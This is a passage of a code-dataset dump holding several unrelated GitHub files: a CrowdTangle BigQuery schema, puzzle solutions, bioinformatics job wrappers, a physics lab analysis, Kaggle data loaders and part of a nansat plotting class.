platform.\",\n \"name\": \"postUrl\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The number of subscriber the account had when the post was published. This is in contrast to the subscriberCount found on the account, which represents the current number of subscribers an account has.\",\n \"name\": \"subscriberCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The type of the post. enum (album, igtv, link, live_video, live_video_complete, live_video_scheduled, native_video, photo, status, video, vine, youtube)\",\n \"name\": \"type\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The date and time the post was most recently updated in CrowdTangle, which is most often via getting new scores from the platform. Time zone is UTC. \\\"yyyy-mm-dd hh:mm:ss\\\")\",\n \"name\": \"updated\",\n \"type\": \"DATETIME\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The length of the video in milliseconds.\",\n \"name\": \"videoLengthMS\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"string The text, if it exists, within an image.\",\n \"name\": \"imageText\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The legacy version of the unique identifier of the post in the CrowdTangle system. This ID is specific to CrowdTangle, not the platform from which the post originated.\",\n \"name\": \"legacyId\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The caption to a photo, if available.\",\n \"name\": \"caption\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"An external URL that the post links to, if available. (Facebook only)\",\n \"name\": \"link\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"date (\\\"yyyy‑mm‑dd hh:mm:ss\\\") The date and time the post was published. Time zone is UTC.\",\n \"name\": \"date\",\n \"type\": \"TIMESTAMP\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Further details, if available. Associated with links or images across different platforms.\",\n \"name\": \"description\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The score of a post as measured by the request. E.g. it will represent the overperforming score if the request sortBy specifies overperforming, the interaction rate if the request specifies interaction_rate, etc.\",\n \"name\": \"score\",\n \"type\": \"FLOAT\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The status of the live video. (\\\"live\\\", \\\"completed\\\", \\\"upcoming\\\")\",\n \"name\": \"liveVideoStatus\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"name of file in GCS\",\n \"name\": \"file_name\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n }\n ]\n },\n 'post_statistics_actual':\n {\n \"description\": \"Actual performance metrics associated with the post.\",\n \"name\": \"post_statistics_actual\",\n \"type\": \"RECORD\",\n \"mode\": \"REQUIRED\",\n \"fields\": [\n {\n \"description\": \"format (\\\"account.id|postExternalId\\\") The unique identifier of the post in the CrowdTangle system. This ID is specific to CrowdTangle, not the platform from which the post originated.\",\n \"name\": \"post_id\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"angryCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook, Instagram, Reddit\",\n \"name\": \"commentCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Instagram\",\n \"name\": \"favoriteCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"hahaCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"likeCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"loveCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"sadCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"shareCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Reddit\",\n \"name\": \"upCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"wowCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"thankfulCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"careCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n }\n ]\n },\n 'post_statistics_expected': {\n \"description\": \"Expected performance metrics associated with the post.\",\n \"name\": \"post_statistics_expected\",\n \"type\": \"RECORD\",\n \"mode\": \"REQUIRED\",\n \"fields\": [\n {\n \"description\": \"format (\\\"account.id|postExternalId\\\") The unique identifier of the post in the CrowdTangle system. This ID is specific to CrowdTangle, not the platform from which the post originated.\",\n \"name\": \"post_id\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"angryCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook, Instagram, Reddit\",\n \"name\": \"commentCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Instagram\",\n \"name\": \"favoriteCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"hahaCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"likeCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"loveCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"sadCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"shareCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Reddit\",\n \"name\": \"upCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"wowCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"thankfulCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"careCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n }\n ]\n },\n 'expanded_links': {\n \"description\": \"List of links as shown to user (original) links that came in the post (which are often shortened), and the expanded links.\",\n \"name\": \"expanded_links\",\n \"type\": \"RECORD\",\n \"mode\": \"REPEATED\",\n \"fields\": [\n {\n \"description\": \"format (\\\"account.id|postExternalId\\\") The unique identifier of the post in the CrowdTangle system. This ID is specific to CrowdTangle, not the platform from which the post originated.\",\n \"name\": \"post_id\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"Expanded version of original link\",\n \"name\": \"expanded\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"original link that came in the post (which are often shortened),\",\n \"name\": \"original\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n ]\n },\n 'media': {\n \"description\": \"Available media for a post.\",\n \"mode\": \"REPEATED\",\n \"name\": \"media\",\n \"type\": \"RECORD\",\n \"fields\": [\n {\n \"description\": \"format (\\\"account.id|postExternalId\\\") The unique identifier of the post in the CrowdTangle system. This ID is specific to CrowdTangle, not the platform from which the post originated.\",\n \"name\": \"post_id\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The source of the full-sized version of the media. API returns this as |full| but that is a reserved word in postgres\",\n \"name\": \"url_full\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The source of the media.\",\n \"name\": \"url\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The width of the media.\",\n \"name\": \"width\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The height of the media.\",\n \"name\": \"height\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The type of the media. enum (photo or video)\",\n \"name\": \"type\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n ]\n }\n}\n","repo_name":"CybersecurityForDemocracy/FacebookApiPolAdsCollector","sub_path":"crowdtangle/crowdtangle_bigquery_schema.py","file_name":"crowdtangle_bigquery_schema.py","file_ext":"py","file_size_in_byte":18397,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"61"} +{"seq_id":"13697126450","text":"file = open(\"day8_digits_input.txt\")\nlines = file.readlines()\n\nresult = 0\ndigits = []\n\none = ''\nfour = ''\nseven = ''\neight = ''\n\nfiveParts = []\nsixParts = []\n\n\nfor i in range(len(lines)) :\n line = lines[i].strip().split(\"|\")\n patterns = line[0].split(\" \")\n output = line[1].split(\" \")\n \n fiveParts = []\n sixParts = []\n\n for j in range(len(patterns)) :\n digit = patterns[j]\n length = len(digit)\n\n if length == 2 :\n one = digit\n elif length == 4 :\n four = digit\n elif length == 3 :\n seven = digit\n elif length == 7 :\n eight = digit\n elif length == 5 :\n fiveParts.append(digit)\n elif length == 6 :\n sixParts.append(digit)\n \n zero = ''\n two = ''\n three = ''\n five = ''\n six = ''\n nine = ''\n\n for k in range(len(fiveParts)) :\n guess = fiveParts[k]\n # is three?\n count = 0\n for letter in guess :\n for element in one :\n if letter == element :\n count = count + 1\n\n if count == 2 :\n three = guess\n else :\n # is five\n count = 0\n for letter in guess :\n for element in four :\n if letter == element :\n count = count + 1\n \n if count == 3 :\n five = guess\n else :\n two = guess \n\n for k in range(len(sixParts)) :\n guess = sixParts[k]\n\n # is nine?\n count = 0\n for letter in guess :\n for element in four :\n if letter == element :\n count = count + 1\n\n if count == 4 :\n nine = guess\n else :\n # is zero?\n count = 0\n for letter in guess :\n for element in one :\n if letter == element :\n count = count + 1\n \n if count == 2 :\n zero = guess\n else :\n six = guess \n \n digits = [zero, one, two, three, four, five, six, seven, eight, nine]\n \n number = 0\n\n for j in range(len(output)) :\n value = output[j]\n\n for k in range(len(digits)) :\n digit = digits[k]\n\n count = 0\n for letter in value :\n for element in digit :\n if letter == element :\n count = count + 1\n # print(k, digit, value)\n if count == len(value) and count == len(digit) :\n number = number * 10 + k\n\n result = result + number\n\nprint(result)\n","repo_name":"aerlevsedi/advent-of-code","sub_path":"AoC2021/day8_digits/day8_B_digits.py","file_name":"day8_B_digits.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3108110982","text":"'''\nBinary Tree Preorder Traversal\n\nGiven the root of a binary tree, return the preorder traversal of its nodes' values.\n'''\n\n# recursive\nclass Solution:\n def preorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n def preorder(root, l):\n if root:\n l.append(root.val)\n l = preorder(root.left, l)\n l = preorder(root.right, l)\n return l\n return preorder(root, [])\n\n# iterative - 1\nclass Solution:\n def preorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n stack = []\n res = []\n while(len(stack) or root!=None):\n while(root):\n res.append(root.val)\n if(root.right):\n stack.append(root.right)\n root = root.left\n if(len(stack)>0):\n root = stack[-1]\n stack.pop()\n return res\n\n# iterative - 2\nclass Solution:\n def preorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n stack = [root]\n res = []\n while stack:\n root = stack.pop()\n if(root):\n res.append(root.val)\n stack.append(root.right)\n stack.append(root.left)\n return res\n","repo_name":"EshikaShah/My-journey-of-competitive-programming","sub_path":"Python/Binary Tree/preorder_traversal.py","file_name":"preorder_traversal.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24584834323","text":"import subprocess\nimport glob\nimport logging\nfrom natsort import natsorted\nfrom prevent_overwrite import prevent_overwrite\n\ndef make_norm_gpr_list(normgprdir, normgprlist):\n \"\"\"Makes a file listing all the normalized, masliner adjusted gpr files\n\n Inputs:\n normgprdir: the path to the directory containing the normalized,\n masliner adjusted gpr files\n NOTE: This assumes that all files of the form 'norm_madj*.gpr'\n should be included\n normgprlist: the path to the output list file\n \"\"\"\n # Do not overwrite normgprlist if it already exists\n prevent_overwrite(normgprlist)\n\n # Get full paths to all files in normgprdir of the form 'norm_madj*.gpr'\n files = glob.glob(normgprdir + '/norm_madj*.gpr')\n files = natsorted(files)\n\n # Write list to normgprlist\n with open(normgprlist, 'w') as f:\n for filename in files:\n f.write(filename + '\\n')\n\n\ndef make_average_probes_comfile(normgprlist, avgtype, comfile):\n \"\"\"Makes a comfile for averaging probe intensities\n\n Inputs:\n normgprlist: the path to the file listing the normalized, masliner\n adjusted gpr files\n avgtype: the type of averaging to perform:\n must be one of ('or', 'br', 'r')\n comfile: the path to the output comfile to write\n \"\"\"\n # Do not overwrite comfile if it already exists\n prevent_overwrite(comfile)\n\n # Open comfile for writing\n with open(comfile, 'w') as f:\n f.write('perl /project/siggers/perl/GENEPIX/' +\n 'average_replicate_rc_custom_probes.pl\\n\\n')\n f.write('-l ' + normgprlist + '\\n')\n f.write('-op ' + avgtype + '\\n')\n f.write('-avg ' + avgtype + '\\n')\n f.write('-no_gfilter')\n\n\ndef run_average_probes_comfile(comfile, avgtype):\n \"\"\"Runs a comfile for averaging probe intensities\n\n Inputs:\n comfile: the comfile to run\n avgtype: the type of averaging to perform:\n must be one of ('or', 'br', 'r')\n This affects the names of the output and error files for this job\n \"\"\"\n # Read contents of comfile as single string on one line\n with open(comfile) as f:\n comfilecont = f.read().replace('\\n', ' ')\n\n # Run comfile\n logging.info('qsub -sync y -P siggers -m a -cwd -N avg_' +\n avgtype + ' -V -b y ' + comfilecont + '\\n')\n subprocess.run(['qsub', '-sync', 'y', '-P', 'siggers', '-m', 'a', '-cwd',\n '-N', 'avg_' + avgtype, '-V', '-b', 'y', comfilecont])\n\n\ndef average_probes_wrapper(normgprdir, avggprdir):\n \"\"\"Averages probe intensities for all normalized gpr files in a directory\n\n Inputs:\n normgprdir: the path to the directory containing the masliner adjusted,\n spatially detrended gpr files to use\n avggprdir: the path to the directory in which to save the output files\n \"\"\"\n # If avggprdir already exists, abort to prevent overwrite\n prevent_overwrite(avggprdir)\n\n # Make avggprdir\n logging.info('Making directory to save averaged gpr files: ' + avggprdir)\n subprocess.run(['mkdir', avggprdir])\n \n # Navigate to avggprdir after saving current working directory\n cwd = subprocess.os.getcwd()\n subprocess.os.chdir(avggprdir)\n \n # Make a file listing all the normalized gpr files to use\n logging.info('Making a list of all normalized gpr files')\n normgprlist = avggprdir + '/norm_gpr.list'\n make_norm_gpr_list(normgprdir, normgprlist)\n \n # Make and run a comfile for averaging probe intensities each of three ways\n for avgtype in ['or', 'br', 'r']:\n logging.info('Making ' + avgtype + ' comfile')\n comfile = 'average_probes_' + avgtype + '.com'\n make_average_probes_comfile(normgprlist, avgtype, comfile)\n logging.info('Running ' + avgtype + ' comfile ' +\n '(this may take a few minutes)')\n run_average_probes_comfile(comfile, avgtype)\n \n # Navigate back to original directory\n subprocess.os.chdir(cwd)\n\n\n","repo_name":"Siggers-Lab/auto_PBM_prepro","sub_path":"average_probes.py","file_name":"average_probes.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18043504767","text":"from openroad import Design, Tech\nimport pdn_aux\nimport helpers\n\ntech = Tech()\ntech.readLef(\"asap7_vias/asap7_tech_1x_noviarules.lef\")\ntech.readLef(\"asap7_vias/asap7sc7p5t_27_R_1x.lef\")\n\ndesign = Design(tech)\ndesign.readDef(\"asap7_vias/floorplan.def\")\n\npdn_aux.add_global_connection(design, net_name=\"VDD\", pin_pattern=\"^VDD$\", power=True)\npdn_aux.add_global_connection(design, net_name=\"VSS\", pin_pattern=\"^VSS$\", ground=True)\n\npdn_aux.set_voltage_domain(design, power='VDD', ground='VSS')\n\npdn_aux.define_pdn_grid_real(design, name=\"Core\")\npdn_aux.add_pdn_stripe(design, followpins=True, layer=\"M1\", width=0.072)\n\ntry:\n pdn_aux.add_pdn_stripe(design, followpins=True, layer=\"M2\", width=0.072)\nexcept Exception as inst:\n print(inst.args[0])\n","repo_name":"The-OpenROAD-Project/OpenROAD","sub_path":"src/pdn/test/widthtable.py","file_name":"widthtable.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":1027,"dataset":"github-code","pt":"61"} +{"seq_id":"27255972043","text":"#!/usr/bin/python\nimport os\ntables = [\"postcode\", \"language\", \"food\", \"weekday_names\", \"restaurant\", \"restaurant_schedule\", \"restaurant_has_food\",\n \"restaurant_transl\", \"food_transl\"]\n\n#create php names: foo_bar => FooBar\ntablesphp = []\nfor table in tables:\n tablesphp.append((table,\"\".join(map(lambda x: x.capitalize(), table.split('_')))))\n\nfor table in tablesphp:\n filename = \"app/\" + table[0] + \".php\"\n if os.path.exists(filename):\n os.remove(filename)\n\nfor table in tablesphp:\n os.system(\"php artisan krlove:generate:model \" + table[1] + \" --table-name=\" + table[0] + \" --no-timestamps\")\n\n#php artisan make:controller RestaurantController -m Restaurant\n","repo_name":"pozhidaevak/food-finder","sub_path":"laravel/generateModels.py","file_name":"generateModels.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39117349503","text":"import numpy as np\nfrom uncertainties import ufloat\nfrom scipy.stats import stats\n\nD_theta, R1, R2, R3, R4, R5 = np.genfromtxt('glas.txt', unpack=True)\n\nT = 1 * 10**-3\nlam = 633 * 10**(-9)\ntheta_0 = 10 * np.pi / 180\ntheta = D_theta * (np.pi)/180\n\n\ndef n(lam, N, T, t):\n return (1-(lam * N)/(2*T*0.175*t))**(-1)\n\n\nn1_mean = ufloat(np.mean(n(lam, R1, T, theta)), stats.sem(n(lam, R1, T, theta)))\nn2_mean = ufloat(np.mean(n(lam, R2, T, theta)), stats.sem(n(lam, R2, T, theta)))\nn3_mean = ufloat(np.mean(n(lam, R3, T, theta)), stats.sem(n(lam, R3, T, theta)))\nn4_mean = ufloat(np.mean(n(lam, R4, T, theta)), stats.sem(n(lam, R4, T, theta)))\nn5_mean = ufloat(np.mean(n(lam, R5, T, theta)), stats.sem(n(lam, R5, T, theta)))\n\nn1 = n(lam, R1, T, theta)\nn2 = n(lam, R2, T, theta)\nn3 = n(lam, R3, T, theta)\nn4 = n(lam, R4, T, theta)\nn5 = n(lam, R5, T, theta)\n\n# np.append(n1, n1_mean)\n# np.append(n2, n2_mean)\n# np.append(n3, n3_mean)\n# np.append(n4, n4_mean)\n# np.append(n5, n5_mean)\n# np.append(theta, np.nan)\n\nprint(n1)\n\nnp.savetxt('TexTabellen/glas.txt', np.column_stack([\n theta * 180/np.pi,\n R1,\n n1,\n R2,\n n2,\n R3,\n n3,\n R4,\n n4,\n R5,\n n5\n ]), delimiter=' & ', newline=r' \\\\'+'\\n',\n fmt='%.0f & %.0f & %.2f & %.0f & %.2f & %.0f & %.2f & %.0f & %.2f & %.0f & %.2f')\n\n\nn_array = [n1_mean, n2_mean, n3_mean, n4_mean, n5_mean]\nn_best = np.mean(n_array)\n\nprint(n_array)\nprint(n_best)\n","repo_name":"FeGeyer/praktikum","sub_path":"BFP/InterferometrieV64/glas.py","file_name":"glas.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8995307789","text":"from time import time\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import fbeta_score\n\n\ndef load_train_datas(train_size, image_dim1, image_dim3, label_size, split):\n image_size = image_dim1 * image_dim1 * image_dim3\n t = time()\n with open(\"datas/train_x32.bin\", 'rb') as f:\n x = np.fromfile(f, dtype=np.uint8, count=train_size * image_size)\n x = x.reshape([train_size, image_size])\n print(\"training images loaded in {:4.2f} seconds\".format(time() - t))\n\n t = time()\n with open(\"datas/train_y32.bin\", 'rb') as f:\n y = np.fromfile(f, dtype=np.uint8, count=train_size * label_size)\n y = y.reshape([train_size, 17])\n print(\"training labels loaded in {:4.2f} seconds\".format(time() - t))\n print(\"\\n\")\n\n x = x / 255.0\n\n train_x, val_x, train_y, val_y = train_test_split(x, y, train_size=split)\n\n return train_x, val_x, train_y, val_y\n\n\ndef load_val_datas(val_size, image_dim1, image_dim3, label_size):\n image_size = image_dim1 * image_dim1 * image_dim3\n t = time()\n with open(\"datas/val_x32.bin\", 'rb') as f:\n x = np.fromfile(f, dtype=np.uint8, count=val_size * image_size)\n x = x.reshape([val_size, image_size])\n print(\"validation images loaded in {:4.2f} seconds\".format(time() - t))\n\n t = time()\n with open(\"datas/val_y32.bin\", 'rb') as f:\n y = np.fromfile(f, dtype=np.uint8, count=val_size * label_size)\n y = y.reshape([val_size, 17])\n print(\"validation labels loaded in {:4.2f} seconds\".format(time() - t))\n print(\"\\n\")\n\n x = x.reshape([val_size, image_dim1, image_dim1, image_dim3])\n x = x / 255.0\n\n return x, y\n\n\ndef load_test_datas(filename, test_size, image_dim1, image_dim3):\n image_size = image_dim1 * image_dim1 * image_dim3\n t = time()\n with open(filename, 'rb') as f:\n test_x = np.fromfile(f, dtype=np.uint8, count=test_size * image_size)\n test_x = test_x.reshape([test_size, image_size])\n print(\"testing images loaded in {:4.2f} seconds\".format(time() - t))\n test_x = test_x / 255.0\n\n return test_x\n\n\ndef make_predictions(model, test_size, image_size, n_colors):\n size = test_size[0]\n size_add = test_size[1]\n\n test_x = load_test_datas(\"datas/test_x32.bin\", size, image_size, n_colors)\n test_x = test_x.reshape([size, image_size, image_size, n_colors])\n predictions = model.predict(test_x, batch_size=128)\n\n test_x = load_test_datas(\"datas/test_x32-add.bin\", size_add, image_size, n_colors)\n test_x = test_x.reshape([size_add, image_size, image_size, n_colors])\n predictions_add = model.predict(test_x, batch_size=128)\n\n final_predictions = np.concatenate([predictions, predictions_add], axis=0)\n\n return final_predictions\n\n\ndef make_submissions(predictions, tresholds, keras_filenames, output_filename):\n print(\"making submissions file\")\n label_predictions = np.array(predictions) > tresholds\n mapper = dict(zip(keras_filenames, label_predictions))\n submissions = pd.read_csv(\"datas/sample_submission.csv\")\n\n label_map = dict(pd.read_csv(\"datas/label_dict.csv\").values)\n inv_label_map = {i: l for l, i in label_map.items()}\n\n for i in range(len(submissions)):\n current_filename = submissions[\"image_name\"].values[i]\n current_filename = \"test-jpg/\" + current_filename + \".jpg\"\n current_predictions = mapper[current_filename]\n s = \"\"\n index_positive = np.where(current_predictions == 1)[0]\n for j in index_positive:\n s += inv_label_map[j]\n s += \" \"\n submissions[\"tags\"].set_value(i, s)\n print(submissions.head())\n submissions.to_csv(output_filename, index=False)\n print(\"submissions file saved\")\n\n\ndef make_submissions_old(predictions, filename):\n label_predictions = np.array(predictions) > 0.2\n submissions = pd.read_csv(\"datas/sample_submission.csv\")\n\n label_map = dict(pd.read_csv(\"datas/label_dict.csv\").values)\n inv_label_map = {i: l for l, i in label_map.items()}\n\n for i in range(len(submissions)):\n s = \"\"\n index_positive = np.where(label_predictions[i] == 1)[0]\n for j in index_positive:\n s += inv_label_map[j]\n s += \" \"\n submissions[\"tags\"].set_value(i, s)\n\n print(submissions.head())\n submissions.to_csv(filename, index=False)\n\n\ndef optimise_f2_thresholds(y, p, verbose=True, resolution=100):\n def mf(x):\n p2 = np.zeros_like(p)\n for i in range(17):\n p2[:, i] = (p[:, i] > x[i]).astype(np.int)\n score = fbeta_score(y, p2, beta=2, average='samples')\n return score\n\n x = [0.2]*17\n for i in range(17):\n best_i2 = 0\n best_score = 0\n for i2 in range(resolution):\n i2 /= resolution\n x[i] = i2\n score = mf(x)\n if score > best_score:\n best_i2 = i2\n best_score = score\n x[i] = best_i2\n if verbose:\n print(i, best_i2, best_score)\n\n return x\n","repo_name":"nyounes/kaggle","sub_path":"amazon/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43909310062","text":"from math import cos, asin, sqrt, pi\n\nfrom services.scraper.models.position import Position as PositionOld\nfrom models.position import Position as PositionNew\n\n\n# returns distance in km on the globe\ndef distance(pos1, pos2):\n if isinstance(pos1, PositionOld) or isinstance(pos1, PositionNew):\n lat1 = float(pos1.lat)\n lon1 = float(pos1.lon)\n else:\n lat1 = float(pos1[0])\n lon1 = float(pos1[1])\n if isinstance(pos2, PositionOld) or isinstance(pos2, PositionNew):\n lat2 = float(pos2.lat)\n lon2 = float(pos2.lon)\n else:\n lat2 = float(pos2[0])\n lon2 = float(pos2[1])\n p = pi / 180\n a = 0.5 - cos((lat2 - lat1) * p) / 2 + cos(lat1 * p) * cos(lat2 * p) * (1 - cos((lon2 - lon1) * p)) / 2\n return 12742 * asin(sqrt(a))\n\n\ndef is_in_poland(lat, lon):\n return (49 < float(lat) < 55) and (14 < float(lon) < 24)\n","repo_name":"mksochota16/fakeChecker","sub_path":"src/app/services/analysis/geolocation.py","file_name":"geolocation.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"23621921921","text":"import itertools as it\n\ndef xor(g):\n\tif len(g)==0:\n\t\treturn 0\n\tif len(g)==1:\n\t\treturn g[0]\n\tg=\"^\".join([str(i) for i in g])\n\treturn eval(g)\n\nf=open(\"in.txt\")\nf_out=open(\"out.txt\",\"w\")\ncases=int(f.readline().strip())\nfor case in range(1,cases+1):\n\tn=int(f.readline().strip())\n\tcandys=map(int,f.readline().strip().split())\n\t#print \"Candys=:\",candys\n\tm=0\n\tfor r in range(1,n/2+1):\n\t\tgroups=it.combinations(candys,r)\n\t\tfor i in groups:\n\t\t\tgroup1=[j for j in i]\n\t\t\tgroup2=candys[:]\n\t\t\tfor ac in group1:\n\t\t\t\tgroup2.remove(ac)\n\t\t\t#print group1,group2, xor(group1),xor(group2)\n\t\t\tif xor(group1)==xor(group2):\n\t\t\t\tnum=max(sum(group1),sum(group2))\n\t\t\t\tif num>m:\n\t\t\t\t\tm=num\n\tif m==0:\n\t\tm=\"NO\"\n\tf_out.write(\"Case #%s: %s\\n\" %(case,m))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_76/917.py","file_name":"917.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33342220788","text":"from __future__ import absolute_import\n\nimport os\nfrom math import floor, log10\n\nimport numpy as np\ntry:\n if 'DISPLAY' not in os.environ:\n import matplotlib; matplotlib.use('Agg')\n from matplotlib import cm\nexcept ImportError:\n MATPLOT_LIB_IS_INSTALLED = False\nelse:\n MATPLOT_LIB_IS_INSTALLED = True\n\ntry:\n import Image\n import ImageDraw\n import ImageFont\nexcept:\n from PIL import Image, ImageDraw, ImageFont\n\nfrom nansat.utils import add_logger\n\n\nclass Figure(object):\n \"\"\"Perform operations with graphical files: create, append legend, save.\n\n Figure instance is created in the Nansat.write_figure method.\n The methods below are applied consequently in order to generate a figure\n from one or three bands, estimate min/max, apply logarithmic scaling,\n convert to uint8, append legend, save to a file\n\n **Modifies:** self.sizeX, self.sizeY (int), width and height of the image\n\n **Modifies:** self.pilImg (PIL image), figure\n\n **Modifies:** self.pilImgLegend (PIL image)\n\n Note\n ----\n If pilImgLegend is None, legend is not added to the figure.\n If it is replaced, pilImgLegend includes text string, color-bar,\n longName and units.\n\n Parameters\n -----------\n array : numpy array (2D or 3D)\n dataset from Nansat\n\n cmin : number (int ot float) or [number, number, number]\n 0, minimum value of varibale in the matrix to be shown\n cmax : number (int ot float) or [number, number, number]\n 1, minimum value of varibale in the matrix to be shown\n gamma : float, >0\n 2, coefficient for tone curve udjustment\n subsetArraySize : int\n 100000, size of the subset array which is used to get histogram\n numOfColor : int\n 250, number of colors for use of the palette.\n 254th is black and 255th is white.\n cmapName : string\n 'jet', name of Matplotlib colormaps\n see --> http://www.scipy.org/Cookbook/Matplotlib/Show_colormaps\n ratio : float, [0 1]\n 1.0, ratio of pixels which are used to write the figure\n numOfTicks : int\n 5, number of ticks on a colorbar\n titleString : string\n '', title of legend (1st line)\n caption : string\n '', caption of the legend (2nd line, e.g. long name and units)\n fontRatio : positive float\n 1, factor for changing the fontSize.\n fontSize : int\n 12, size of the font of title, caption and ticks.\n If not given, fontSize is calculated using fontRatio:\n fontSize = height / 45 * fontRatio.\n fontSize has priority over fontRatio\n logarithm : boolean, defult = False\n If True, tone curve is used to convert pixel values.\n If False, linear.\n legend : boolean, default = False\n if True, information as textString, colorbar, longName and\n units are added in the figure.\n mask_array : 2D numpy array, int, the shape should be equal to\n array.shape. If given, this array is used for masking land,\n clouds, etc on the output image. Value of the array are\n indices. LUT from mask_lut is used for coloring upon this\n indices.\n mask_lut : dictionary\n Look-Up-Table with colors for masking land, clouds 